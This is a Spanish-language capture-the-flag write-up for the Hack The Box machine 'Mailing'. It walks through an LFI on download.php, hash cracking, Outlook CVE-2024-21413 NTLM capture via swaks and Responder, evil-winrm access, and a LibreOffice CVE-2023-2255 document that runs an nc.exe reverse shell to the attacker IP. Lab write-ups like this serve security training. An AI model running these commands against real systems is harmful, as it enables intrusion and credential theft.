Mailing

OS: Windows
Dificultad: Fácil
Puntos: 20

Nmap Scan

ports=$(nmap -p- --min-rate=5000 -T4 10.129.13.29 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p $ports -sC -sV -oN nmap.txt 10.129.13.29
Nmap scan report for 10.129.13.29
Host is up (0.29s latency).

PORT      STATE SERVICE       VERSION
25/tcp    open  smtp          hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp   open  pop3          hMailServer pop3d
|_pop3-capabilities: USER TOP UIDL
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp   open  imap          hMailServer imapd
|_imap-capabilities: completed CAPABILITY OK ACL RIGHTS=texkA0001 IMAP4 IDLE SORT NAMESPACE QUOTA CHILDREN IMAP4rev1
445/tcp   open  microsoft-ds?
465/tcp   open  ssl/smtp      hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
587/tcp   open  smtp          hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
993/tcp   open  ssl/imap      hMailServer imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
|_imap-capabilities: completed CAPABILITY OK ACL RIGHTS=texkA0001 IMAP4 IDLE SORT NAMESPACE QUOTA CHILDREN IMAP4rev1
5040/tcp  open  unknown
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open  pando-pub?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
64503/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeracion

En la pagina principal se encuentra un boton para descargar archivos.

Esta funcion es vulnerable a LFI.

Local File Inclusion (LFI)

Podemos obtener el archivo de configuracion de hMailServer a traves del LFI.

http://mailing.htb/download.php?file=../../Program+Files+(x86)/hmailserver/Bin/hmailserver.ini
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7

Crack Hash

Utilizando crackstation obtenemos el password.

homenetworkingadministrator

Microsoft Outlook RCE (CVE-2024-21413)

Despues de investigar varias cosas se dedujo que posiblemete es vulnerable al CVE-2024-21413 ya que se menciona mucho outlook en el PDF de la funcion de descarga y tenemos un usuario/password para mandar correos. Llegamos al exploit de outlook que nos permitira lekear informacion con el siguiente script:

python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.14.218\doom' --subject 'Test'

Tambien es posible obtenerlo de la siguiente forma que me funciono correctamente.

swaks --auth LOGIN --server mailing.htb --port 587 --to maya@mailing.htb --from administrator@mailing.htb --auth-user administrator@mailing.htb --auth-password homenetworkingadministrator --body  '<html><body><a href="file:///\\\\10.10.14.218\\test\\test.rtf!something">CLICK ME</a></body></html>'
responder -I tun0 -v

Usamos John para crackear el password.

┌──(root㉿kali)-[~/htb/Box/Mailing]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
m4y4ngs4ri       (maya)     
1g 0:00:00:06 DONE (2024-05-07 09:10) 0.1501g/s 890849p/s 890849c/s 890849C/s m61405..m4895621
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 

Con ese password podemos autenticarnos por winrm.

evil-winrm -i mailing.htb -u 'maya' -p 'm4y4ngs4ri'

Privilege Escalation

En la raiz hay una carpeta llamada Important Documents.

*Evil-WinRM* PS C:\> dir


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         4/10/2024   5:32 PM                Important Documents
d-----         2/28/2024   8:49 PM                inetpub
d-----         12/7/2019  10:14 AM                PerfLogs

Tambien en los programas del sistema encontramos LibreOffice instalado en su version 7.4.

*Evil-WinRM* PS C:\> type "Program Files\LibreOffice\readmes\readme_en-US.txt"


======================================================================

LibreOffice 7.4 ReadMe

======================================================================

LibreOffice (CVE-2023-2255)

La version de LibreOffice es vulnerable al siguiente exploit.

Primero subiremos nc.exe a la maquina para obtener una reverse shell.

mkidr c:\temp
upload /root/htb/Box/Mailing/nc.exe c:\temp\
*Evil-WinRM* PS C:\Important documents> dir c:\temp


    Directory: C:\temp


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          5/7/2024   3:31 PM          45272 nc.exe

Ahora generaremos nuestro archivo odt.

┌──(root㉿kali)-[~/htb/Box/Mailing/CVE-2023-2255]
└─# python3 CVE-2023-2255.py --cmd "c:\temp\nc.exe -e cmd.exe 10.10.14.218 1234" --output 'doom.odt'
File doom.odt has been created !

Posteriormente lo descargaremos en la maquina en el directorio Important documents.

*Evil-WinRM* PS C:\Important documents> upload /root/htb/Box/Mailing/CVE-2023-2255/doom.odt
                                        
Info: Uploading /root/htb/Box/Mailing/CVE-2023-2255/doom.odt to C:\Important documents\doom.odt
                                        
Data: 40704 bytes of 40704 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Important documents> dir


    Directory: C:\Important documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          5/7/2024   3:36 PM          30529 doom.odt

Despues de un momento obtenemos nuestra reverse shell.

Este usuario cuenta con todos los privilegios asi que podemos realizar cualquier accion.

Referencias

https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
https://github.com/elweth-sec/CVE-2023-2255
https://github.com/int0x33/nc.exe/blob/master/nc64.exe